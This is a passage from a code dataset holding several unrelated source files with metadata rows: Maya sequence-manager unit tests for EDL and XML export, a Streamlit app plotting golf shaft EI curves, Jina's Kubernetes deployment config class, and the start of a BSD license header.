def test_create_sequence_is_working_properly(self):
    """testing if create_sequence is working properly
    """
    self.maxDiff = None
    sequence = self.sm.create_sequence()
    # the created node must be a Maya "sequencer" ...
    self.assertEqual('sequencer', sequence.type())
    # ... whose message attribute connects back to the SequenceManager
    self.assertEqual(self.sm, sequence.message.connections()[0])
def test_create_sequence_is_properly_setting_the_sequence_name(self):
    """testing if create_sequence stores the given name in the
    sequence_name attribute of the created sequence
    """
    seq = self.sm.create_sequence('Test Sequence')
    self.assertEqual(
        'Test Sequence',
        seq.sequence_name.get()
    )
def test_to_edl_is_working_properly(self):
    """testing if to_edl method is working properly
    """
    import edl

    # create a sequence carrying three shots
    sequence = self.sm.create_sequence('sequence1')
    for shot_code in ('shot1', 'shot2', 'shot3'):
        sequence.create_shot(shot_code)

    edl_list = self.sm.to_edl()
    # the manager must hand back an edl.List instance
    self.assertIsInstance(edl_list, edl.List)
def test_to_edl_will_generate_a_proper_edl_content(self):
    """testing if to_edl will generate a proper edl content
    """
    edl_path = os.path.abspath('./test_data/test_v001.edl')
    # fix: the original looked up 'sequenceManager1' and called
    # set_version('v001') twice in a row; a single setup pass is
    # equivalent and avoids the redundant node lookup.
    sm = pymel.core.PyNode('sequenceManager1')
    sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
    sm.set_version('v001')
    seq1 = sm.create_sequence('SEQ001_HSNI_003')
    # three consecutive shots on track 1, each with a 10 frame handle
    shot1 = seq1.create_shot('0010')
    shot1.startFrame.set(0)
    shot1.endFrame.set(33)
    shot1.sequenceStartFrame.set(1)
    shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
    shot1.handle.set(10)
    shot1.track.set(1)
    shot2 = seq1.create_shot('0020')
    shot2.startFrame.set(34)
    shot2.endFrame.set(64)
    shot2.sequenceStartFrame.set(35)
    shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
    shot2.handle.set(10)
    shot2.track.set(1)
    shot3 = seq1.create_shot('0030')
    shot3.startFrame.set(65)
    shot3.endFrame.set(110)
    shot3.sequenceStartFrame.set(66)
    shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
    shot3.handle.set(10)
    shot3.track.set(1)
    self.assertEqual(shot1.track.get(), 1)
    self.assertEqual(shot2.track.get(), 1)
    self.assertEqual(shot3.track.get(), 1)
    # render the EDL and compare it against the stored expectation
    edl_list = sm.to_edl()
    result = edl_list.to_string()
    with open(edl_path) as f:
        expected_edl_content = f.read()
    self.assertEqual(
        expected_edl_content,
        result
    )
def test_generate_sequence_structure_returns_a_sequence_instance(self):
    """testing if generate_sequence_structure() method will return a
    Sequence instance
    """
    manager = pymel.core.PyNode('sequenceManager1')
    sequence = manager.create_sequence('sequence1')
    # two shots with movie outputs are enough to build a structure from
    for shot_code, movie_path in (('shot1', '/tmp/shot1.mov'),
                                  ('shot2', '/tmp/shot2.mov')):
        shot = sequence.create_shot(shot_code)
        shot.output.set(movie_path)
    structure = manager.generate_sequence_structure()
    self.assertIsInstance(structure, Sequence)
def test_generate_sequence_structure_will_generate_sequences_and_shots_with_correct_number_of_tracks(self):
    """testing if a proper sequence structure will be generated by using
    the generate_sequence_structure() method with correct number of tracks
    """
    path = os.path.abspath('./test_data/test_v001.xml')
    manager = pymel.core.PyNode('sequenceManager1')
    manager.from_xml(path)
    sequence_node = manager.sequences.get()[0]
    shots = sequence_node.shots.get()
    # the first three imported shots must all sit on track 1
    for index in range(3):
        self.assertEqual(1, shots[index].track.get())
    structure = manager.generate_sequence_structure()
    tracks = structure.media.video.tracks
    # a single video track ...
    self.assertEqual(1, len(tracks))
    # ... that carries all three clips
    self.assertEqual(3, len(tracks[0].clips))
def test_set_shot_name_template_is_working_properly(self):
    """testing if set_shot_name_template() is working properly
    """
    manager = pymel.core.PyNode('sequenceManager1')
    # a fresh node has no template attribute yet
    self.assertFalse(manager.hasAttr('shot_name_template'))
    template = '<Sequence>_<Shot>_<Version>'
    manager.set_shot_name_template(template)
    # the call must create the attribute and store the template in it
    self.assertTrue(manager.hasAttr('shot_name_template'))
    self.assertEqual(template, manager.shot_name_template.get())
def test_get_shot_name_template_is_working_properly(self):
    """testing if get_shot_name_template() is working properly
    """
    sm = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(sm.hasAttr('shot_name_template'))
    test_template = '<Sequence>_<Shot>_<Version>'
    sm.set_shot_name_template(test_template)
    self.assertTrue(sm.hasAttr('shot_name_template'))
    # the getter must return exactly what the setter stored
    self.assertEqual(sm.get_shot_name_template(), test_template)
def test_get_shot_name_template_will_create_shot_name_template_attribute_if_missing(self):
    """testing if get_shot_name_template() will create the
    shot_name_template attribute if missing
    """
    sm = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(sm.hasAttr('shot_name_template'))
    # reading the template must create the attribute with the default value
    result = sm.get_shot_name_template()
    self.assertTrue(sm.hasAttr('shot_name_template'))
    self.assertEqual(result, '<Sequence>_<Shot>_<Version>')
def test_set_version_is_working_properly(self):
    """testing if set_version() is working properly
    """
    manager = pymel.core.PyNode('sequenceManager1')
    # the attribute must not exist before the call
    self.assertFalse(manager.hasAttr('version'))
    expected_version = 'v001'
    manager.set_version(expected_version)
    # now it exists and holds the value we supplied
    self.assertTrue(manager.hasAttr('version'))
    self.assertEqual(expected_version, manager.version.get())
def test_get_version_is_working_properly(self):
    """testing if get_version() is working properly
    """
    sm = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(sm.hasAttr('version'))
    test_version = 'v001'
    sm.set_version(test_version)
    self.assertTrue(sm.hasAttr('version'))
    # the getter must return exactly what the setter stored
    self.assertEqual(sm.get_version(), test_version)
def test_get_version_will_create_attribute_if_missing(self):
    """testing if get_version() will create the missing version attribute
    """
    manager = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(manager.hasAttr('version'))
    # reading the version on a fresh node must add the attribute ...
    returned_version = manager.get_version()
    self.assertTrue(manager.hasAttr('version'))
    # ... and default it to an empty string
    self.assertEqual('', returned_version)
def test_set_task_name_is_working_properly(self):
    """testing if set_task_name() is working properly
    """
    manager = pymel.core.PyNode('sequenceManager1')
    # a fresh node has no task_name attribute yet
    self.assertFalse(manager.hasAttr('task_name'))
    expected_task_name = 'Animation'
    manager.set_task_name(expected_task_name)
    # the call must create the attribute and store the value in it
    self.assertTrue(manager.hasAttr('task_name'))
    self.assertEqual(expected_task_name, manager.task_name.get())
def test_get_task_name_is_working_properly(self):
    """testing if get_task_name() is working properly
    """
    sm = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(sm.hasAttr('task_name'))
    test_task_name = 'Animation'
    sm.set_task_name(test_task_name)
    self.assertTrue(sm.hasAttr('task_name'))
    # the getter must return exactly what the setter stored
    self.assertEqual(sm.get_task_name(), test_task_name)
def test_get_task_name_will_create_attribute_if_missing(self):
    """testing if get_task_name() will create the missing task_name attribute
    """
    manager = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(manager.hasAttr('task_name'))
    # reading the task name on a fresh node must add the attribute ...
    returned_task_name = manager.get_task_name()
    self.assertTrue(manager.hasAttr('task_name'))
    # ... and default it to an empty string
    self.assertEqual('', returned_task_name)
def test_set_take_name_is_working_properly(self):
    """testing if set_take_name() is working properly
    """
    manager = pymel.core.PyNode('sequenceManager1')
    # a fresh node has no take_name attribute yet
    self.assertFalse(manager.hasAttr('take_name'))
    expected_take_name = 'Main'
    manager.set_take_name(expected_take_name)
    # the call must create the attribute and store the value in it
    self.assertTrue(manager.hasAttr('take_name'))
    self.assertEqual(expected_take_name, manager.take_name.get())
def test_get_take_name_is_working_properly(self):
    """testing if get_take_name() is working properly
    """
    sm = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(sm.hasAttr('take_name'))
    test_take_name = 'Main'
    sm.set_take_name(test_take_name)
    self.assertTrue(sm.hasAttr('take_name'))
    # the getter must return exactly what the setter stored
    self.assertEqual(sm.get_take_name(), test_take_name)
def test_get_take_name_will_create_attribute_if_missing(self):
    """testing if get_take_name() will create the missing take_name attribute
    """
    manager = pymel.core.PyNode('sequenceManager1')
    self.assertFalse(manager.hasAttr('take_name'))
    # reading the take name on a fresh node must add the attribute ...
    returned_take_name = manager.get_take_name()
    self.assertTrue(manager.hasAttr('take_name'))
    # ... and default it to an empty string
    self.assertEqual('', returned_take_name)
def test_generate_sequence_structure_is_working_properly(self):
    """testing if generate_sequence_structure() method is working properly
    """
    sm = pymel.core.PyNode('sequenceManager1')
    from anima.env import mayaEnv
    mayaEnv.Maya.set_fps(fps=24)
    sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
    sm.set_version('v001')
    seq1 = sm.create_sequence('SEQ001_HSNI_003')
    # shot1 and shot2 share track 1, shot3 sits alone on track 2
    shot1 = seq1.create_shot('0010')
    shot1.startFrame.set(0)
    shot1.endFrame.set(24)
    shot1.sequenceStartFrame.set(0)
    shot1.track.set(1)
    shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
    shot1.handle.set(10)
    shot2 = seq1.create_shot('0020')
    shot2.startFrame.set(10)
    shot2.endFrame.set(35)
    shot2.sequenceStartFrame.set(25)
    shot2.track.set(1)
    shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
    shot2.handle.set(15)
    shot3 = seq1.create_shot('0030')
    shot3.startFrame.set(25)
    shot3.endFrame.set(50)
    shot3.sequenceStartFrame.set(45)
    shot3.track.set(2)
    shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
    shot3.handle.set(20)
    seq = sm.generate_sequence_structure()
    self.assertIsInstance(seq, Sequence)
    # sequence level data: 24 fps non-NTSC, timecode starting at zero
    rate = seq.rate
    self.assertEqual('24', rate.timebase)
    self.assertEqual(False, rate.ntsc)
    self.assertEqual('00:00:00:00', seq.timecode)
    self.assertEqual(False, seq.ntsc)
    media = seq.media
    self.assertIsInstance(media, Media)
    video = media.video
    self.assertIsInstance(video, Video)
    self.assertIsNone(media.audio)
    # two tracks: shots 1+2 on the first, shot 3 on the second
    self.assertEqual(2, len(video.tracks))
    track1 = video.tracks[0]
    self.assertIsInstance(track1, Track)
    self.assertEqual(len(track1.clips), 2)
    self.assertEqual(track1.enabled, True)
    track2 = video.tracks[1]
    self.assertIsInstance(track2, Track)
    self.assertEqual(len(track2.clips), 1)
    self.assertEqual(track2.enabled, True)
    # clip data generated from shot1
    clip1 = track1.clips[0]
    self.assertIsInstance(clip1, Clip)
    self.assertEqual('Video', clip1.type)
    self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.id)
    self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.name)
    self.assertEqual(10, clip1.in_)  # handle
    self.assertEqual(35, clip1.out)  # handle + duration
    self.assertEqual(0, clip1.start)  # sequenceStartFrame
    self.assertEqual(25, clip1.end)  # sequenceEndFrame + 1
    # clip data generated from shot2
    clip2 = track1.clips[1]
    self.assertIsInstance(clip2, Clip)
    self.assertEqual('Video', clip2.type)
    self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.id)
    self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.name)
    self.assertEqual(15, clip2.in_)  # handle
    self.assertEqual(41, clip2.out)  # handle + duration
    self.assertEqual(25, clip2.start)  # sequenceStartFrame
    self.assertEqual(51, clip2.end)  # sequenceEndFrame + 1
    # clip data generated from shot3
    clip3 = track2.clips[0]
    self.assertIsInstance(clip3, Clip)
    self.assertEqual('Video', clip3.type)
    self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.id)
    self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.name)
    self.assertEqual(20, clip3.in_)  # startFrame
    self.assertEqual(46, clip3.out)  # endFrame + 1
    self.assertEqual(45, clip3.start)  # sequenceStartFrame
    self.assertEqual(71, clip3.end)  # sequenceEndFrame + 1
    # file references carry the output path and the handle-padded duration
    file1 = clip1.file
    self.assertIsInstance(file1, File)
    self.assertEqual('SEQ001_HSNI_003_0010_v001', file1.name)
    self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0010_v001.mov',
                     file1.pathurl)
    self.assertEqual(45, file1.duration)  # including handles
    file2 = clip2.file
    self.assertIsInstance(file2, File)
    self.assertEqual('SEQ001_HSNI_003_0020_v001', file2.name)
    self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0020_v001.mov',
                     file2.pathurl)
    self.assertEqual(56, file2.duration)  # including handles
    file3 = clip3.file
    self.assertIsInstance(file3, File)
    self.assertEqual('SEQ001_HSNI_003_0030_v001', file3.name)
    self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0030_v001.mov',
                     file3.pathurl)
    self.assertEqual(66, file3.duration)  # including handles
| tests/previs/test_sequence_manager_extension.py | 30,520 | tests the SequenceManagerExtension class
set up the test
testing if create_sequence is working properly
testing if create_sequence is working properly
testing if from_edl method will update Sequences and shots
correctly with the edl file
testing if from_edl method will update Sequences and shots correctly
when shots are used more than once
testing if from_xml method will generate Sequences and shots
correctly
testing if a TypeError will be raised when the path argument is not
a string
testing if an IOError will be raised when the path argument is not
a valid path
testing if a TypeError will be raised when the path argument is
skipped
testing if from_xml method will update Sequences and shots
correctly with the xml file
testing if from_xml method will update Sequences and shots
correctly with the xml file
testing if generate_sequence_structure() method is working properly
testing if generate_sequence_structure() method will return a
Sequence instance
testing if a proper sequence structure will be generated by using
the generate_sequence_structure() method with correct number of tracks
testing if set_shot_name_template() is working properly
testing if set_shot_name_template() will create the
shot_name_template attribute if missing
testing if set_take_name() is working properly
testing if get_take_name() will create the missing take_name attribute
testing if set_task_name() is working properly
testing if get_task_name() will create the missing task_name attribute
testing if set_version() is working properly
testing if get_version() will create the missing version attribute
testing if set_shot_name_template() is working properly
testing if set_take_name() is working properly
testing if set_task_name() is working properly
testing if set_version() is working properly
testing if to_edl method is working properly
testing if to_edl will generate a proper edl content
testing if a proper xml compatible string will be generated with
to_xml() method
-*- coding: utf-8 -*- prepare for test to setup maya extensions create a new scene and get the sequenceManager in the scene check scene fps check timecode Clip2 Clip3 now update it with test_v002.xml check shot data Clip2 Clip3 now update it with test_v002.xml check shot data Clip2 Clip3 set a camera for shot4 now update it with test_v002.xml check if there are 4 shots check shot data Clip2 Clip3 Clip4 there should be an extra shot check if their cameras also the same now update it with test_v002.xml we should have 2 shots only check shot data Clip2 removed Clip3 create a sequence handle handle + duration sequenceStartFrame sequenceEndFrame + 1 handle handle + duration sequenceStartFrame sequenceEndFrame + 1 startFrame endFrame + 1 sequenceStartFrame sequenceEndFrame + 1 including handles including handles including handles | 2,964 | en | 0.693469 |
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
##python3 script created by tBarford on 20220205
##
##
##File Description: This is the streamlit webapp MVP for BG Golf EI Profile Database Demo
## run in term w/ : streamlit run streamlit_app.py
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
import streamlit as st
import firestoreservice as fs
from matplotlib import pyplot as plt
import PIL as img
def main():
    """Render the BG Golf EI Profile Database demo.

    Sidebar: pick a shaft (type / model / stiffness) and optionally a
    second shaft to compare against.  Main pane: plot the measured EI
    curves of the selected shaft(s) when the user presses the button.
    """
    firestore = fs.FirestoreService()

    ## Sidebar
    with st.sidebar:
        st.subheader('Shaft Selection Tools:')
        shaftType = st.selectbox('Type of shaft:', options=['iron', 'wood'], key='type')
        shaft = st.selectbox('Choose a shaft to display:', options=firestore.getShaftList(shaftType), key='shaft')
        stiffness = st.selectbox('Choose a stiffness:', options=firestore.getStiffness(shaftType, shaft), key='stiff')

        compare = st.radio('Compare another shaft?', options=['No', 'Yes'])
        if compare == 'Yes':
            shaftType_compare = st.selectbox('Type of shaft:', options=['iron', 'wood'], key='type2')
            shaft_compare = st.selectbox('Choose a shaft to display:', options=firestore.getShaftList(shaftType_compare), key='shaft2')
            stiffness_compare = st.selectbox('Choose a stiffness:', options=firestore.getStiffness(shaftType_compare, shaft_compare), key='stiff2')
        else:
            shaftType_compare, shaft_compare, stiffness_compare = None, None, None

    ## Main Content
    st.image(img.Image.open('./assets/bg_logo_horz.png'), use_column_width=True)
    st.header('Shaft Profile Demo')

    # Collect the EI curves to plot.  Start from an empty dict so the
    # button handler below can never hit an undefined variable (bug fix:
    # dataToPlot used to be created only when a stiffness was selected,
    # raising a NameError otherwise).
    dataToPlot = {}
    if stiffness is not None:
        dataToPlot[f'{shaft} {stiffness}'] = firestore.getEI(shaftType, shaft, stiffness)
    if stiffness_compare is not None:
        dataToPlot[f'{shaft_compare} {stiffness_compare}'] = firestore.getEI(shaftType_compare, shaft_compare, stiffness_compare)

    if st.button('Update Plot') and dataToPlot:
        fig, ax = plt.subplots()
        # each entry holds (lengths-from-tip, EI values) for one shaft
        for label in dataToPlot:
            curve = dataToPlot[label]
            ax.plot(curve[0], curve[1], label=label)
        ax.set(xlabel='Length From Tip (in.)', ylabel='EI',
               title='BG Measured EI Curve')
        ax.grid()
        ax.legend()
        st.pyplot(fig)
if __name__ == '__main__':
main() | streamlit_app.py | 2,395 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~python3 script created by tBarford on 20220205File Description: This is the streamlit webapp MVP for BG Golf EI Profile Database Demo run in term w/ : streamlit run streamlit_app.py~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sidebar Main Contentmanage shafts to plot | 310 | en | 0.492047 |
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
    """
    Class that implements the output of configuration files for Kubernetes for a given Deployment.
    """

    class _K8sDeployment:
        # Helper describing one Kubernetes Deployment (head, worker or
        # gateway) and able to render its YAML configuration dictionaries.

        def __init__(
            self,
            name: str,
            version: str,
            pod_type: PodRoleType,
            jina_deployment_name: str,
            shard_id: Optional[int],
            common_args: Union['Namespace', Dict],
            deployment_args: Union['Namespace', Dict],
            k8s_namespace: str,
            k8s_connection_pool: bool = True,
            k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
        ):
            self.name = name
            # k8s object names must be DNS compatible
            self.dns_name = to_compatible_name(name)
            self.version = version
            self.pod_type = pod_type
            self.jina_deployment_name = jina_deployment_name
            self.shard_id = shard_id
            self.common_args = common_args
            self.deployment_args = deployment_args
            self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
            self.k8s_namespace = k8s_namespace
            self.k8s_connection_pool = k8s_connection_pool
            self.k8s_deployments_addresses = k8s_deployments_addresses

        def get_gateway_yamls(
            self,
        ) -> List[Dict]:
            """Render the k8s Deployment YAML dicts for the gateway pod."""
            import os

            # JINA_K8S_USE_TEST_PIP switches to the pip-based test image
            test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
            image_name = (
                'jinaai/jina:test-pip'
                if test_pip
                else f'jinaai/jina:{self.version}-py38-standard'
            )
            cargs = copy.copy(self.deployment_args)
            cargs.env = None
            cargs.deployments_addresses = self.k8s_deployments_addresses
            from jina.helper import ArgNamespace
            from jina.parsers import set_gateway_parser

            # arguments that must never be forwarded to the gateway container
            taboo = {
                'uses_with',
                'uses_metas',
                'volumes',
                'uses_before',
                'uses_after',
                'workspace',
                'workspace_id',
                'upload_files',
                'noblock_on_start',
            }
            non_defaults = ArgNamespace.get_non_defaults_args(
                cargs, set_gateway_parser(), taboo=taboo
            )
            _args = ArgNamespace.kwargs2list(non_defaults)
            container_args = ['gateway'] + _args
            if not cargs.k8s_connection_pool:
                container_args.append('--k8s-disable-connection-pool')
            return kubernetes_deployment.get_deployment_yamls(
                self.dns_name,
                namespace=self.k8s_namespace,
                image_name=image_name,
                container_cmd='["jina"]',
                container_args=f'{container_args}',
                replicas=1,
                pull_policy='IfNotPresent',
                jina_deployment_name='gateway',
                pod_type=self.pod_type,
                port=self.common_args.port,
                env=cargs.env,
            )

        def _get_image_name(self, uses: Optional[str]):
            """Resolve the container image: the default Jina image unless a
            containerized Executor is given in *uses*."""
            import os

            test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
            image_name = (
                'jinaai/jina:test-pip'
                if test_pip
                else f'jinaai/jina:{self.version}-py38-perf'
            )
            if uses is not None and uses != __default_executor__:
                image_name = get_image_name(uses)
            return image_name

        def _get_container_args(self, cargs, pod_type):
            """Build the runtime container argument list from *cargs*."""
            uses_metas = cargs.uses_metas or {}
            uses_with = self.deployment_args.uses_with
            if cargs.uses != __default_executor__:
                # inside the container the Executor is loaded from its config.yml
                cargs.uses = 'config.yml'
            return construct_runtime_container_args(
                cargs, uses_metas, uses_with, pod_type
            )

        def get_runtime_yamls(
            self,
        ) -> List[Dict]:
            """Render the k8s Deployment YAML dicts for a head/worker pod,
            including optional uses_before/uses_after containers."""
            cargs = copy.copy(self.deployment_args)
            image_name = self._get_image_name(cargs.uses)
            image_name_uses_before = (
                self._get_image_name(cargs.uses_before)
                if hasattr(cargs, 'uses_before') and cargs.uses_before
                else None
            )
            image_name_uses_after = (
                self._get_image_name(cargs.uses_after)
                if hasattr(cargs, 'uses_after') and cargs.uses_after
                else None
            )
            container_args = self._get_container_args(cargs, pod_type=self.pod_type)
            container_args_uses_before = None
            if getattr(cargs, 'uses_before', False):
                # derive the uses_before container args from the main args,
                # stripping everything that only applies to the main container
                uses_before_cargs = copy.copy(cargs)
                uses_before_cargs.uses = cargs.uses_before
                uses_before_cargs.name = f'{self.common_args.name}/uses-before'
                uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
                uses_before_cargs.uses_before_address = None
                uses_before_cargs.uses_after_address = None
                uses_before_cargs.uses_before = None
                uses_before_cargs.uses_after = None
                uses_before_cargs.uses_with = None
                uses_before_cargs.uses_metas = None
                uses_before_cargs.env = None
                uses_before_cargs.connection_list = None
                uses_before_cargs.runtime_cls = 'WorkerRuntime'
                uses_before_cargs.pod_role = PodRoleType.WORKER
                uses_before_cargs.polling = None
                container_args_uses_before = self._get_container_args(
                    uses_before_cargs, PodRoleType.WORKER
                )
            container_args_uses_after = None
            if getattr(cargs, 'uses_after', False):
                # same treatment for the uses_after container
                uses_after_cargs = copy.copy(cargs)
                uses_after_cargs.uses = cargs.uses_after
                uses_after_cargs.name = f'{self.common_args.name}/uses-after'
                uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
                uses_after_cargs.uses_before_address = None
                uses_after_cargs.uses_after_address = None
                uses_after_cargs.uses_before = None
                uses_after_cargs.uses_after = None
                uses_after_cargs.uses_with = None
                uses_after_cargs.uses_metas = None
                uses_after_cargs.env = None
                uses_after_cargs.connection_list = None
                uses_after_cargs.runtime_cls = 'WorkerRuntime'
                uses_after_cargs.pod_role = PodRoleType.WORKER
                uses_after_cargs.polling = None
                container_args_uses_after = self._get_container_args(
                    uses_after_cargs, PodRoleType.WORKER
                )
            return kubernetes_deployment.get_deployment_yamls(
                self.dns_name,
                namespace=self.k8s_namespace,
                image_name=image_name,
                image_name_uses_after=image_name_uses_after,
                image_name_uses_before=image_name_uses_before,
                container_cmd='["jina"]',
                container_cmd_uses_before='["jina"]',
                container_cmd_uses_after='["jina"]',
                container_args=f'{container_args}',
                container_args_uses_before=container_args_uses_before,
                container_args_uses_after=container_args_uses_after,
                replicas=self.num_replicas,
                pull_policy='IfNotPresent',
                jina_deployment_name=self.jina_deployment_name,
                pod_type=self.pod_type,
                shard_id=self.shard_id,
                env=cargs.env,
                gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
            )

    def __init__(
        self,
        args: Union['Namespace', Dict],
        k8s_namespace: Optional[str] = None,
        k8s_connection_pool: bool = True,
        k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
    ):
        """Split *args* into head/worker deployment configurations.

        :param args: namespace (or dict) of the Deployment to convert
        :param k8s_namespace: Kubernetes namespace to deploy into
        :param k8s_connection_pool: whether the k8s connection pool is used
        :param k8s_deployments_addresses: addresses handed to the gateway
        """
        # External Deployments should be ignored in a K8s based Flow
        assert not (hasattr(args, 'external') and args.external)
        if not validate_uses(args.uses):
            raise NoContainerizedError(
                f'Executor "{args.uses}" is not valid to be used in K8s. '
                'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you building containerized Executors.'
            )
        self.k8s_namespace = k8s_namespace
        self.k8s_connection_pool = k8s_connection_pool
        self.k8s_deployments_addresses = k8s_deployments_addresses
        self.head_deployment = None
        self.args = copy.copy(args)
        if k8s_namespace is not None:
            # otherwise it will remain with the one from the original Deployment
            self.args.k8s_namespace = k8s_namespace
        self.args.k8s_connection_pool = k8s_connection_pool
        self.name = self.args.name
        self.deployment_args = self._get_deployment_args(self.args)
        # the gateway has no head deployment
        if self.deployment_args['head_deployment'] is not None:
            self.head_deployment = self._K8sDeployment(
                name=self.deployment_args['head_deployment'].name,
                version=get_base_executor_version(),
                shard_id=None,
                jina_deployment_name=self.name,
                common_args=self.args,
                deployment_args=self.deployment_args['head_deployment'],
                pod_type=PodRoleType.HEAD,
                k8s_namespace=self.k8s_namespace,
                k8s_connection_pool=self.k8s_connection_pool,
                k8s_deployments_addresses=self.k8s_deployments_addresses,
            )
        # one worker deployment per shard
        self.worker_deployments = []
        deployment_args = self.deployment_args['deployments']
        for i, args in enumerate(deployment_args):
            name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
            self.worker_deployments.append(
                self._K8sDeployment(
                    name=name,
                    version=get_base_executor_version(),
                    shard_id=i,
                    common_args=self.args,
                    deployment_args=args,
                    pod_type=PodRoleType.WORKER
                    if name != 'gateway'
                    else PodRoleType.GATEWAY,
                    jina_deployment_name=self.name,
                    k8s_namespace=self.k8s_namespace,
                    k8s_connection_pool=self.k8s_connection_pool,
                    k8s_deployments_addresses=self.k8s_deployments_addresses
                    if name == 'gateway'
                    else None,
                )
            )

    def _get_deployment_args(self, args):
        """Split *args* into the head deployment arguments plus one
        argument set per shard (worker) deployment."""
        parsed_args = {
            'head_deployment': None,
            'deployments': [],
        }
        shards = getattr(args, 'shards', 1)
        uses_before = getattr(args, 'uses_before', None)
        uses_after = getattr(args, 'uses_after', None)
        if args.name != 'gateway':
            parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
                self.args
            )
            # the head never runs the Executor itself
            parsed_args['head_deployment'].gpus = None
            parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
            parsed_args['head_deployment'].uses = None
            parsed_args['head_deployment'].uses_metas = None
            parsed_args['head_deployment'].uses_with = None
            parsed_args['head_deployment'].env = None

            # if the k8s connection pool is disabled, the connection pool is managed manually
            if not self.k8s_connection_pool:
                import json

                # build an explicit shard-id -> service address map
                connection_list = {}
                for i in range(shards):
                    name = (
                        f'{to_compatible_name(self.name)}-{i}'
                        if shards > 1
                        else f'{to_compatible_name(self.name)}'
                    )
                    connection_list[
                        str(i)
                    ] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
                parsed_args['head_deployment'].connection_list = json.dumps(
                    connection_list
                )
            if uses_before:
                parsed_args[
                    'head_deployment'
                ].uses_before_address = (
                    f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
                )
            if uses_after:
                parsed_args[
                    'head_deployment'
                ].uses_after_address = (
                    f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
                )
        for i in range(shards):
            cargs = copy.deepcopy(args)
            cargs.shard_id = i
            cargs.uses_before = None
            cargs.uses_after = None
            if args.name != 'gateway':
                cargs.port = K8sGrpcConnectionPool.K8S_PORT
            cargs.uses_before_address = None
            cargs.uses_after_address = None
            if shards > 1:
                cargs.name = f'{cargs.name}-{i}'
            if args.name == 'gateway':
                cargs.pod_role = PodRoleType.GATEWAY
            else:
                # the worker runtimes do not care
                cargs.k8s_connection_pool = False
            parsed_args['deployments'].append(cargs)
        return parsed_args

    def to_k8s_yaml(
        self,
    ) -> List[Tuple[str, List[Dict]]]:
        """
        Return a list of dictionary configurations. One for each deployment in this Deployment
        .. # noqa: DAR201
        .. # noqa: DAR101
        """
        if self.name == 'gateway':
            # the gateway has no head; a single deployment is enough
            return [
                (
                    'gateway',
                    self.worker_deployments[0].get_gateway_yamls(),
                )
            ]
        else:
            # head first, then every shard's worker deployment
            deployments = [self.head_deployment]
            deployments.extend(self.worker_deployments)
            return [
                (
                    deployment.dns_name,
                    deployment.get_runtime_yamls(),
                )
                for deployment in deployments
            ]
| jina/orchestrate/deployments/config/k8s.py | 14,858 | Class that implements the output of configuration files for Kubernetes for a given Deployment.
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
External Deployments should be ignored in a K8s based Flow otherwise it will remain with the one from the original Deployment if the k8s connection pool is disabled, the connection pool is managed manually the worker runtimes do not care | 465 | en | 0.859786 |
#!/usr/bin/env python
# Copyright (c) 2014, Norwegian University of Science and Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
